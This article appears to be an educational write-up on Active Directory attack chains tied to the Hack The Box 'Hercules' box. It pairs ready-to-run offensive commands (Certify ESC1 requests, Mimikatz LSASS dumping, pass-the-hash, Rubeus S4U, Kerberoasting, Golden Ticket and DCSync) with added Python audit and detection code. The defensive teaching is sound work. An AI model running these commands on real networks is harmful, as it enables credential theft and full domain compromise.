
Introduction:
A recent complex Hack The Box challenge, dubbed “Hercules,” demonstrates a critical cybersecurity truth: total domain compromise is rarely the result of a single critical flaw. Instead, it is the culmination of multiple minor misconfigurations in identity, delegation, and certificate services that, when chained together, create a catastrophic domino effect. This article deconstructs the attack paths prevalent in modern Active Directory environments, providing the commands and methodologies used by both penetration testers and defenders to identify and remediate these subtle yet devastating weaknesses.
Learning Objectives:
- Understand and identify common Active Directory misconfigurations related to Kerberos delegation and certificate services.
- Learn the offensive techniques to exploit these misconfigurations for privilege escalation and lateral movement.
- Implement defensive hardening measures to secure identity and access management fundamentals.
You Should Know:
1. Enumerating Kerberos Delegation
Unconstrained and constrained delegation are frequent sources of privilege escalation. Unconstrained delegation allows a service to impersonate any user to any other service, a significant security risk.
Verified Commands:
PowerView: Find computers with unconstrained delegation
Get-NetComputer -Unconstrained
AD Module: Find user and computer accounts with constrained delegation
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
Using ldapsearch on Linux
ldapsearch -H ldap://dc.domain.com -x -b "DC=domain,DC=com" "(&(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn
Step-by-step guide:
First, import PowerView into your PowerShell session. Running `Get-NetComputer -Unconstrained` will list all computer accounts configured with unconstrained delegation. An attacker can target these systems to capture TGTs (Ticket Granting Tickets) of high-value accounts, like Domain Admins, which may authenticate to the compromised service. For defenders, this enumeration is crucial for identifying and removing unnecessary delegation grants.
2. Abusing Certificate Templates for Domain Escalation
Active Directory Certificate Services (AD CS) can be misconfigured to allow low-privileged users to enroll in certificates that grant domain admin privileges.
Verified Commands:
PowerShell AD CS module: Enumerate certificate templates
Get-CATemplate | Select-Object Name, Oid
Using Certify.exe to find vulnerable templates
Certify.exe find /vulnerable
Requesting a certificate using the SAN (Subject Alternative Name) exploit
Certify.exe request /ca:DC.domain.com\CA /template:VulnerableTemplate /altname:domadmin
Step-by-step guide:
After downloading and compiling the `Certify` C# tool, run `Certify.exe find /vulnerable` from a compromised user’s context. This lists templates for which you have enrollment rights and whose settings allow privilege escalation, such as templates that do not require manager approval or that define overly permissive EKUs (Extended Key Usage). If such a template also lets the enrollee specify a Subject Alternative Name (SAN), you can request a certificate with a SAN set to a domain admin, which can then be used with `Rubeus` to obtain a TGT for that privileged account.
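The conditions Certify tests for when it reports a template as vulnerable (the ESC1 case: enrollee-supplied subject, no manager approval, no authorized signatures, an authentication-capable EKU, and enrollment rights for low-privileged principals) can be checked offline from an LDAP export of the template objects, which is how a defender audits the same weakness. The following is an added example, not code from the article, from Certify or from Hack The Box; the template records are constructed dictionaries whose attribute names follow the pKICertificateTemplate schema, and the `enroll` list is an assumed pre-resolved view of the template's enrollment ACEs.

```python
# Added example: offline ESC1 audit of AD CS certificate templates.
# Template records are constructed to mimic pKICertificateTemplate LDAP attributes
# (under CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,...).

# msPKI-Certificate-Name-Flag: the subject/SAN is taken from the request
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag: a CA manager must approve each request
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that let the resulting certificate authenticate to the domain (PKINIT)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
# Principals that amount to "every account in the domain"
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

# Constructed sample templates; flag values are illustrative, not a real CA's export.
SAMPLE_TEMPLATES = [
    {"name": "VulnerableTemplate", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    {"name": "User", "msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x29,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
     "enroll": ["Domain Users"]},
    {"name": "WebServer", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"], "enroll": ["Domain Admins"]},
    {"name": "ApprovedAuth", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": [], "enroll": ["Authenticated Users"]},
]


def allows_authentication(ekus):
    """An empty EKU list means the certificate is valid for any purpose, including logon."""
    return not ekus or bool(AUTH_EKUS & set(ekus))


def esc1_findings(template):
    """Return the ESC1 conditions this template meets; all five must hold for the template to be abusable."""
    reasons = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee supplies subject/SAN")
    if not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        reasons.append("no manager approval")
    if template["msPKI-RA-Signature"] == 0:
        reasons.append("no authorized signature required")
    if allows_authentication(template["pKIExtendedKeyUsage"]):
        reasons.append("EKU permits client authentication")
    if LOW_PRIV_PRINCIPALS & set(template["enroll"]):
        reasons.append("low-privileged principals can enroll")
    return reasons


def is_esc1(template):
    return len(esc1_findings(template)) == 5


def audit_esc1(templates):
    """Map each fully ESC1-exposed template to the reasons, for a remediation ticket."""
    return {t["name"]: esc1_findings(t) for t in templates if is_esc1(t)}


if __name__ == "__main__":
    for name, reasons in audit_esc1(SAMPLE_TEMPLATES).items():
        print(name, "->", "; ".join(reasons))
```

Remediation follows directly from whichever condition you break: clear the enrollee-supplies-subject flag, require manager approval, or remove the broad enrollment ACE. The default User template is reported safe here only because its subject is built from AD rather than the request; templates duplicated from it and then "made flexible" are the usual source of the finding.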
3. Dumping Credentials with Mimikatz
Mimikatz is the quintessential tool for credential dumping from LSASS memory, typically used after achieving local administrator rights on a machine.
Verified Commands:
Classic LSASS dump to get NTLM hashes and Kerberos tickets
mimikatz privilege::debug
mimikatz sekurlsa::logonpasswords
Dumping Kerberos tickets from memory
mimikatz sekurlsa::tickets /export
PTH (Pass-the-Hash) attack execution
mimikatz sekurlsa::pth /user:Administrator /domain:domain.com /ntlm:<hash> /run:cmd.exe
Step-by-step guide:
Ensure you have local admin privileges (privilege::debug must return “Privilege ’20’ OK”). The `sekurlsa::logonpasswords` command will extract plaintext passwords, NTLM hashes, and Kerberos tickets currently cached on the system. These credentials can be re-used for lateral movement (Pass-the-Hash, Pass-the-Ticket). Defenders can mitigate this by enabling Credential Guard on Windows 10/11 and Server 2016+ systems.
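Beyond Credential Guard, the detection side of this step is a process-access telemetry rule: `sekurlsa` commands must open LSASS with memory-read rights, which Sysmon records as Event ID 10 (ProcessAccess) with the requested access mask and the caller's call stack. The block below is an added example and not part of the article or of Mimikatz; it runs that rule over constructed, flattened Sysmon records (the `Key: Value | Key: Value` layout is an assumed export format) and uses an assumed allowlist of images that legitimately read LSASS, which you would build from your own baseline.

```python
# Added example: flag LSASS handle opens that carry memory-read rights (Sysmon Event ID 10).

# Process access rights from winnt.h
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_ALL_ACCESS = 0x1FFFFF

# Assumed allowlist (lower-cased) of images that read LSASS as part of normal operation.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed sample records; frames inside CallTrace are separated by '|' with no spaces,
# field separators are ' | ' with spaces.
SAMPLE_EVENTS = [
    r"UtcTime: 2024-05-01 10:02:11 | SourceImage: C:\Program Files\Windows Defender\MsMpEng.exe | TargetImage: C:\Windows\system32\lsass.exe | GrantedAccess: 0x1410 | CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d2e4",
    r"UtcTime: 2024-05-01 10:03:40 | SourceImage: C:\Windows\System32\Taskmgr.exe | TargetImage: C:\Windows\system32\lsass.exe | GrantedAccess: 0x1400 | CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d2e4",
    r"UtcTime: 2024-05-01 10:05:02 | SourceImage: C:\Temp\tool.exe | TargetImage: C:\Windows\system32\lsass.exe | GrantedAccess: 0x1010 | CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d2e4|C:\Temp\tool.exe+4f11",
    r"UtcTime: 2024-05-01 10:06:15 | SourceImage: C:\Windows\System32\svchost.exe | TargetImage: C:\Windows\system32\lsass.exe | GrantedAccess: 0x1fffff | CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d2e4|UNKNOWN(000001A3B2C40000)",
    r"UtcTime: 2024-05-01 10:07:00 | SourceImage: C:\Temp\tool.exe | TargetImage: C:\Windows\system32\notepad.exe | GrantedAccess: 0x1010 | CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d2e4",
]


def parse_event(line):
    """Split one flattened record into a dict; the first ': ' ends the key, so drive letters survive."""
    return dict(field.split(": ", 1) for field in line.split(" | "))


def classify(event):
    """Return the reasons an LSASS access is suspicious, or None when it is not (or not LSASS at all)."""
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    access = int(event["GrantedAccess"], 16)
    reasons = []
    if access == PROCESS_ALL_ACCESS or access & (PROCESS_VM_READ | PROCESS_VM_WRITE):
        reasons.append("memory read/write access 0x%x" % access)
    if "UNKNOWN" in event.get("CallTrace", ""):
        # A frame in unbacked memory means the caller is not a loaded module (injected code),
        # so the allowlist must not excuse it even when the host process is trusted.
        reasons.append("call stack frame from unbacked memory")
    if event["SourceImage"].lower() in ALLOWLIST and "call stack frame from unbacked memory" not in reasons:
        return None
    return reasons or None


def detect(lines):
    """Run the rule over raw records and return the alerts worth a triage ticket."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        reasons = classify(event)
        if reasons:
            alerts.append({"time": event["UtcTime"], "source": event["SourceImage"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["time"], alert["source"], "; ".join(alert["reasons"]))
```

Task Manager and the AV engine fall through: the first never asks for VM_READ, the second is allowlisted with a clean call stack. The injected `svchost.exe` is still caught because the unbacked-memory frame overrides the allowlist.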
4. Forcing Kerberos Authentication for Privilege Escalation
Resource-Based Constrained Delegation (RBCD) can be exploited if you have the right to modify a computer object’s attributes.
Verified Commands:
PowerView: Check for GenericWrite, GenericAll rights on a computer object
Get-NetComputer | Get-ObjectAcl | ? {$_.ActiveDirectoryRights -match "GenericAll|WriteProperty|GenericWrite"}
Configure RBCD on a target computer to allow a compromised machine to delegate to it
Set-ADComputer -Identity "TargetComputer$" -PrincipalsAllowedToDelegateToAccount "CompromisedMachine$"
Using the Rubeus tool to request a service ticket and then impersonate an admin
Rubeus.exe s4u /user:CompromisedMachine$ /rc4:<MachineHash> /impersonateuser:Administrator /msdsspn:http/TargetComputer.domain.com /ptt
Step-by-step guide:
First, enumerate which computer objects your compromised account has write permissions over using PowerView’s Get-ObjectAcl. If you have the necessary rights (e.g., GenericWrite), you can use the `Set-ADComputer` cmdlet to set the `msDS-AllowedToActOnBehalfOfOtherIdentity` property (RBCD) to a computer account you control. Then, using the NTLM hash of the compromised machine account, perform an S4U2Self/S4U2Proxy exchange with Rubeus to get a service ticket for the target computer as a Domain Admin and inject it into memory (/ptt).
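Sections 1 and 4 enumerate the same attributes from the attacker's side; a defender runs the audit over an LDAP or AD-module export of every computer object and triages the result by risk. The block below is an added example, not code from the article, PowerView or Hack The Box. It assumes a constructed export in which `msDS-AllowedToActOnBehalfOfOtherIdentity` (a binary security descriptor in the directory) has already been resolved to the trustee names it grants and stored under an assumed key `rbcdPrincipals`; the AD module exposes that resolved view as the `PrincipalsAllowedToDelegateToAccount` property.

```python
# Added example: rank delegation settings across computer accounts.
from collections import Counter

# userAccountControl bits (ADS_USER_FLAG values); 0x80000 = 524288 is the bit the ldapsearch filter matches
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000                 # domain controller
UF_TRUSTED_FOR_DELEGATION = 0x80000              # unconstrained delegation
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000    # protocol transition ("use any authentication protocol")

# Constructed sample export; rbcdPrincipals is the assumed pre-resolved RBCD trustee list.
SAMPLE_COMPUTERS = [
    {"name": "DC01$", "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": [], "rbcdPrincipals": []},
    {"name": "WEB01$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": [], "rbcdPrincipals": []},
    {"name": "APP01$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/FILE01.domain.com"], "rbcdPrincipals": []},
    {"name": "SQL01$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToDelegateTo": ["cifs/FILE01.domain.com"], "rbcdPrincipals": []},
    {"name": "TargetComputer$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToDelegateTo": [], "rbcdPrincipals": ["CompromisedMachine$"]},
    {"name": "WS42$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToDelegateTo": [], "rbcdPrincipals": []},
]


def delegation_findings(obj):
    """Return (severity, description) pairs for one computer object."""
    uac = obj["userAccountControl"]
    is_dc = bool(uac & UF_SERVER_TRUST_ACCOUNT)
    findings = []
    if uac & UF_TRUSTED_FOR_DELEGATION:
        if is_dc:
            findings.append(("info", "unconstrained delegation on a domain controller (default, expected)"))
        else:
            findings.append(("high", "unconstrained delegation: any TGT sent to this host can be reused"))
    targets = obj["msDS-AllowedToDelegateTo"]
    if targets:
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            # S4U2Self without the user's credentials, then S4U2Proxy to the listed services
            findings.append(("high", "constrained delegation with protocol transition to " + ", ".join(targets)))
        else:
            findings.append(("medium", "constrained delegation (Kerberos only) to " + ", ".join(targets)))
    elif uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
        findings.append(("medium", "protocol transition enabled without any delegation targets"))
    if obj["rbcdPrincipals"]:
        findings.append(("medium", "RBCD: " + ", ".join(obj["rbcdPrincipals"]) + " may delegate to this host"))
    return findings


def audit_delegation(computers):
    """Map each computer that has any delegation configured to its findings."""
    report = {}
    for obj in computers:
        findings = delegation_findings(obj)
        if findings:
            report[obj["name"]] = findings
    return report


def summarize(report):
    """Count findings per severity so the high ones can be tracked to closure."""
    return Counter(sev for findings in report.values() for sev, _ in findings)


if __name__ == "__main__":
    report = audit_delegation(SAMPLE_COMPUTERS)
    for name, findings in report.items():
        for severity, text in findings:
            print(f"{severity:6} {name:16} {text}")
    print(dict(summarize(report)))
```

Unconstrained delegation on anything but a domain controller is the headline finding; an RBCD entry is not necessarily wrong, but every trustee listed there should be a principal you recognise, and the ACL that allowed it to be written is what the PowerView `Get-ObjectAcl` query above surfaces.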
5. Exploiting Active Directory Integration with Web Services
Web servers integrated with AD often have service principals. Misconfigurations in these SPNs can be exploited for Kerberoasting or via Web Shells to execute AD queries.
Verified Commands:
Requesting all service tickets for offline cracking (Kerberoasting)
GetUserSPNs.py domain.com/user:password -dc-ip <DC_IP> -request
Using a web shell to run AD queries via .NET
System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher("(&(objectCategory=user)(samaccountname=admin))");
search.FindAll();
Using wmic from a command line for lateral movement
wmic /node:"TARGET_IP" /user:"DOMAIN\user" /password:"password" process call create "cmd.exe /c whoami > C:\output.txt"
Step-by-step guide:
Kerberoasting is a low-and-slow attack that targets service accounts. Using a tool like `GetUserSPNs.py` from the Impacket suite, you can request service tickets for all registered SPNs. These tickets are encrypted with the service account’s password hash and can be cracked offline. Defenders should implement strong, complex passwords for service accounts and consider using Group Managed Service Accounts (gMSAs), which have automatically managed, long, and complex passwords.
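Both the S4U exchange of section 4 and a Kerberoasting run leave their mark in the same place: the domain controller's Event ID 4769 (service ticket requested). An S4U2Proxy request logs a non-empty Transited Services field, and a roasting sweep shows up as one client address requesting RC4 (encryption type 0x17) tickets for many user-account SPNs in a short window. The block below is an added example and not code from the article or from Impacket; it assumes a constructed `Key=Value; Key=Value` export of 4769 fields, and the burst threshold and window are assumed tuning values.

```python
# Added example: two detections over Event ID 4769 records.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17   # Ticket Encryption Type value for RC4 service tickets (AES256 is 0x12)

# Constructed sample records: one normal request, a four-SPN RC4 sweep, one S4U2Proxy request,
# and a lone RC4 request from a legacy client that should not alert.
SAMPLE_4769 = [
    "Time=2024-05-01T10:00:01; Account=alice@DOMAIN.COM; Service=WEB01$; TicketEncryptionType=0x12; ClientAddress=10.0.0.5; TransitedServices=",
    "Time=2024-05-01T10:00:05; Account=bob@DOMAIN.COM; Service=svc_sql; TicketEncryptionType=0x17; ClientAddress=10.0.0.9; TransitedServices=",
    "Time=2024-05-01T10:00:06; Account=bob@DOMAIN.COM; Service=svc_web; TicketEncryptionType=0x17; ClientAddress=10.0.0.9; TransitedServices=",
    "Time=2024-05-01T10:00:07; Account=bob@DOMAIN.COM; Service=svc_backup; TicketEncryptionType=0x17; ClientAddress=10.0.0.9; TransitedServices=",
    "Time=2024-05-01T10:00:08; Account=bob@DOMAIN.COM; Service=svc_iis; TicketEncryptionType=0x17; ClientAddress=10.0.0.9; TransitedServices=",
    "Time=2024-05-01T10:05:00; Account=Administrator@DOMAIN.COM; Service=TargetComputer$; TicketEncryptionType=0x12; ClientAddress=10.0.0.20; TransitedServices=host/CompromisedMachine.domain.com@DOMAIN.COM",
    "Time=2024-05-01T11:00:00; Account=carol@DOMAIN.COM; Service=svc_sql; TicketEncryptionType=0x17; ClientAddress=10.0.0.30; TransitedServices=",
]


def parse_4769(line):
    """Parse one flattened record; adds a datetime and an integer encryption type."""
    rec = dict(part.split("=", 1) for part in line.split("; "))
    rec["time"] = datetime.fromisoformat(rec["Time"])
    rec["etype"] = int(rec["TicketEncryptionType"], 16)
    return rec


def find_s4u(events):
    """Delegation (S4U2Proxy) requests: Transited Services lists the service the ticket passed through."""
    return [(e["Account"], e["Service"], e["TransitedServices"]) for e in events if e["TransitedServices"]]


def is_user_spn(service):
    """Machine accounts end in '$' and krbtgt is the TGS itself; roasting targets everything else."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def find_kerberoasting(events, threshold=3, window=timedelta(minutes=5)):
    """Client addresses that pulled RC4 tickets for >= threshold distinct user SPNs inside one window."""
    by_addr = defaultdict(list)
    for e in events:
        if e["etype"] == RC4_HMAC and is_user_spn(e["Service"]):
            by_addr[e["ClientAddress"]].append((e["time"], e["Service"]))
    alerts = {}
    for addr, requests in by_addr.items():
        requests.sort()
        for i, (start, _) in enumerate(requests):
            services = {svc for t, svc in requests[i:] if t - start <= window}
            if len(services) >= threshold:
                alerts[addr] = sorted(services)
                break
    return alerts


if __name__ == "__main__":
    events = [parse_4769(line) for line in SAMPLE_4769]
    for account, service, transited in find_s4u(events):
        print("S4U2Proxy:", account, "->", service, "via", transited)
    for addr, services in find_kerberoasting(events).items():
        print("Kerberoasting from", addr, ":", ", ".join(services))
```

The single RC4 request from 10.0.0.30 is the usual false-positive source (a legacy client or a service account without AES keys); moving service accounts to AES-only, or to gMSAs as the text recommends, makes an RC4 request rare enough that even one is worth a look. The S4U rule is a starting point: legitimate constrained delegation also produces Transited Services entries, so compare the delegating service against the delegation audit rather than alerting blindly.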
6. Lateral Movement with WMI and PowerShell Remoting
Once credentials are obtained, lateral movement is key to navigating the domain.
Verified Commands:
Using PowerShell Remoting with captured credentials
$cred = New-Object System.Management.Automation.PSCredential("DOMAIN\user", (ConvertTo-SecureString "password" -AsPlainText -Force))
Enter-PSSession -ComputerName TARGET_COMPUTER -Credential $cred
Executing a command remotely via WMI
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName TARGET_COMPUTER -Credential $cred
Using the built-in PsExec-like functionality of Impacket's wmiexec
wmiexec.py domain/user:password@TARGET_IP
Step-by-step guide:
PowerShell Remoting (WinRM) is a common and powerful method for lateral movement. First, create a PSCredential object with the obtained credentials. The `Enter-PSSession` cmdlet will give you an interactive shell on the remote host. For non-interactive command execution, use Invoke-Command. Defenders should restrict WinRM and WMI access to administrative users only and monitor for anomalous remote connections, especially those using compromised service accounts.
7. Golden Ticket Attack for Persistent Domain Access
A Golden Ticket attack provides persistent, nearly undetectable access to the entire domain by forging Kerberos TGTs.
Verified Commands:
Using Mimikatz to create a Golden Ticket
mimikatz kerberos::golden /user:fakeuser /domain:domain.com /sid:<Domain_SID> /krbtgt:<KRBTGT_NTLM_Hash> /id:500 /ptt
Using the ticket to access the Domain Controller
dir \\DC.domain.com\C$
Command to dump the KRBTGT hash (requires Domain Admin)
mimikatz lsadump::dcsync /user:domain\krbtgt
Step-by-step guide:
To create a Golden Ticket, you need the domain’s SID and the NTLM hash of the KRBTGT account, which can be obtained via a Domain Controller sync (lsadump::dcsync). Once you have these components, the `kerberos::golden` command in Mimikatz forges a TGT. Using `/ptt` injects this ticket into the current session, granting you Domain Admin access to any resource. The primary defense is to protect the KRBTGT account hash and consider rotating it twice (as per Microsoft’s recommendation) if a compromise is suspected.
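Two properties of a forged TGT make it visible despite the "nearly undetectable" reputation: the domain controllers never issued it, so there is no Event ID 4768 (TGT requested) for the account before its Kerberos logons appear, and the account in the ticket may not exist in the directory at all (the `/user:fakeuser` above). The same 4624 logon events also expose the lateral movement of section 6 as one account reaching many hosts in a short time. The block below is an added example and not code from the article or from Mimikatz; it correlates constructed `Key=Value; Key=Value` records of 4768 and 4624 events against a constructed account inventory, and the thresholds and windows are assumed tuning values.

```python
# Added example: forged-TGT and lateral-movement heuristics over 4768/4624 records.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed directory inventory: accounts that really exist in AD.
KNOWN_ACCOUNTS = {"alice", "bob", "svc_backup", "Administrator", "WS01$", "WS02$", "FILE01$"}

# Constructed sample log: alice logs on normally; svc_backup fans out over NTLM (pass-the-hash
# pattern); fakeuser and Administrator appear with Kerberos logons and no preceding 4768.
SAMPLE_EVENTS = [
    "Time=2024-05-01T08:55:00; EventID=4768; Account=alice; Host=DC01",
    "Time=2024-05-01T09:00:00; EventID=4768; Account=svc_backup; Host=DC01",
    "Time=2024-05-01T09:01:00; EventID=4624; Account=alice; LogonType=3; AuthPackage=Kerberos; Source=10.0.0.5; Host=FILE01",
    "Time=2024-05-01T09:10:00; EventID=4624; Account=svc_backup; LogonType=3; AuthPackage=NTLM; Source=10.0.0.41; Host=WS01",
    "Time=2024-05-01T09:11:00; EventID=4624; Account=svc_backup; LogonType=3; AuthPackage=NTLM; Source=10.0.0.41; Host=WS02",
    "Time=2024-05-01T09:12:00; EventID=4624; Account=svc_backup; LogonType=3; AuthPackage=NTLM; Source=10.0.0.41; Host=FILE01",
    "Time=2024-05-01T09:30:00; EventID=4624; Account=fakeuser; LogonType=3; AuthPackage=Kerberos; Source=10.0.0.77; Host=DC01",
    "Time=2024-05-01T09:31:00; EventID=4624; Account=Administrator; LogonType=3; AuthPackage=Kerberos; Source=10.0.0.77; Host=DC01",
]


def parse_event(line):
    rec = dict(part.split("=", 1) for part in line.split("; "))
    rec["time"] = datetime.fromisoformat(rec["Time"])
    return rec


def find_lateral_movement(events, threshold=3, window=timedelta(minutes=30)):
    """Accounts with network/RDP logons (types 3 and 10) to >= threshold distinct hosts inside one window."""
    by_account = defaultdict(list)
    for e in events:
        if e["EventID"] == "4624" and e["LogonType"] in ("3", "10"):
            by_account[e["Account"]].append((e["time"], e["Host"]))
    alerts = {}
    for account, logons in by_account.items():
        logons.sort()
        for i, (start, _) in enumerate(logons):
            hosts = {h for t, h in logons[i:] if t - start <= window}
            if len(hosts) >= threshold:
                alerts[account] = sorted(hosts)
                break
    return alerts


def find_forged_ticket_candidates(events, known_accounts, tgt_lifetime=timedelta(hours=10)):
    """Kerberos logons for unknown accounts, or for accounts with no 4768 within the TGT lifetime before them.

    tgt_lifetime defaults to the Kerberos policy default "Maximum lifetime for user ticket" (10 hours).
    Requires 4768 events from every domain controller, otherwise the gap is a collection gap.
    """
    tgt_issued = defaultdict(list)
    for e in events:
        if e["EventID"] == "4768":
            tgt_issued[e["Account"]].append(e["time"])
    findings = []
    for e in events:
        if e["EventID"] != "4624" or e["AuthPackage"] != "Kerberos":
            continue
        account = e["Account"]
        if account not in known_accounts:
            findings.append((account, e["Host"], "account does not exist in the directory"))
        elif not any(timedelta(0) <= e["time"] - t <= tgt_lifetime for t in tgt_issued[account]):
            findings.append((account, e["Host"], "Kerberos logon with no TGT issuance (4768) in the preceding TGT lifetime"))
    return findings


if __name__ == "__main__":
    events = [parse_event(line) for line in SAMPLE_EVENTS]
    print("lateral movement:", find_lateral_movement(events))
    for account, host, reason in find_forged_ticket_candidates(events, KNOWN_ACCOUNTS):
        print("forged TGT candidate:", account, "on", host, "-", reason)
```

The 4768 gap is the more durable signal: rotating KRBTGT twice invalidates the forged ticket, but until then a golden ticket can carry a lifetime of years, so the account keeps logging on without the DCs ever issuing it a TGT. The lateral-movement rule needs a per-account baseline (backup and monitoring accounts legitimately touch many hosts), which is why the threshold and window are parameters.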
What Undercode Say:
- The attack surface of Active Directory is vast and extends far beyond simple user passwords, residing in complex inter-service trust relationships like delegation and certificate enrollment.
- A defensive strategy focused solely on perimeter defense and patch management is insufficient; a deep understanding of identity and authentication flow within the network is paramount for resilience.
The “Hercules” box is a microcosm of modern corporate networks. It proves that attackers are not always looking for a single zero-day; they are methodically mapping the trust relationships you’ve built. The combination of unconstrained delegation, weak certificate template settings, and excessive service account permissions creates a predictable and exploitable chain. For blue teams, the lesson is that auditing these configurations is no longer optional. Continuous monitoring for abnormal authentication attempts, especially those involving protocol transitions (like S4U), and strict adherence to the principle of least privilege for delegation and certificate enrollment rights are the only ways to break these attack chains before they lead to a full-scale breach.
Prediction:
The sophistication of AD-based attacks will continue to evolve, moving further into the cloud-hybrid identity perimeter. As pure on-premises AD becomes less common, attacks will increasingly target the trust relationships between on-prem AD and cloud Azure AD instances. Techniques similar to Golden Ticket attacks, but for cloud-based identity providers like Azure AD, will emerge, potentially leveraging misconfigured Conditional Access policies, Application Registrations, and Service Principals. The focus for attackers will shift from owning the on-prem domain controller to compromising the hybrid identity join, allowing them to pivot into the much broader and often less-monitored cloud environment.
Reported By: Grisha Petrosyan – Hackers Feeds